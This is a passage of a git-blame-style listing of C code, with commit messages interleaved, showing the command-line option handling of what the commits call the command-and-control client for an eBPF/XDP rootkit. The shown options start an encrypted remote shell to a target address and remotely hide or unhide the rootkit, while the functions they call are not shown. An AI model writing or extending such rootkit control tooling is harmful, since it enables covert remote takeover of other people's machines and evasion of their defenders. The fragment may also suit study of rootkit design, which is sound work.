			`activate_command_control_shell_encrypted(dest_address);`
			`PARAM_MODULE_ACTIVATED = 1;`

Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client 2021-11-22 18:58:58 -05:00			`break;`
			`/*case 'u':`
			`print_welcome_message();`
			`sleep(1);`
			`//Selecting show rootkit - Unhide mode`
			`printf("["KBLU"INFO"RESET"]""Selected UNHIDE the rootkit remotely\n");`
			`//printf("Option m has argument %s\n", optarg);`
			`strcpy(dest_address, optarg);`
			`show_rootkit(dest_address);`
			`PARAM_MODULE_ACTIVATED = 1;`

			`break;`
			`case 'i':`
			`print_welcome_message();`
			`sleep(1);`
			`//Selecting hide rootkit - Invisible mode`
			`printf("["KBLU"INFO"RESET"]""Selected HIDE the rootkit remotely\n");`
			`//printf("Option m has argument %s\n", optarg);`
			`strcpy(dest_address, optarg);`
			`hide_rootkit(dest_address);`
			`PARAM_MODULE_ACTIVATED = 1;`

			`case 'e':`
			`ENCRYPT_MODE_SEL = 1;`
			`strcpy(dest_address, optarg);`

			`break;`
			`case 'd':`
			`DECRYPT_MODE_SEL = 1;`
			`strcpy(dest_address, optarg);`
			`break;`

			`case 'p':`
			`PATH_ARG_PROVIDED = 1;`
			`strcpy(path_arg, optarg);`
			`break;*/`

			`case 'h':`
			`print_help_dialog(argv[0]);`
			`exit(0);`
			`break;`
			`case '?':`
			`printf("["KRED"ERROR"RESET"]""Unknown option: %c\n", optopt);`
			`break;`
			`case ':':`
			`printf("["KRED"ERROR"RESET"]""Missing arguments for %c\n", optopt);`
			`exit(EXIT_FAILURE);`
			`break;`

			`default:`
			`print_help_dialog(argv[0]);`
			`exit(EXIT_FAILURE);`
			`}`
			`}`

Finished adapting the client. Cleaned the user code and added getopt. The filter fully works now. Next step: return data to userspace via a map. 2021-11-22 20:02:47 -05:00			`if(PARAM_MODULE_ACTIVATED==0){`
Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client 2021-11-22 18:58:58 -05:00			`printf("["KRED"ERROR"RESET"]""Invalid parameters\n");`
			`print_help_dialog(argv[0]);`
			`exit(EXIT_FAILURE);`
			`}`

			`}`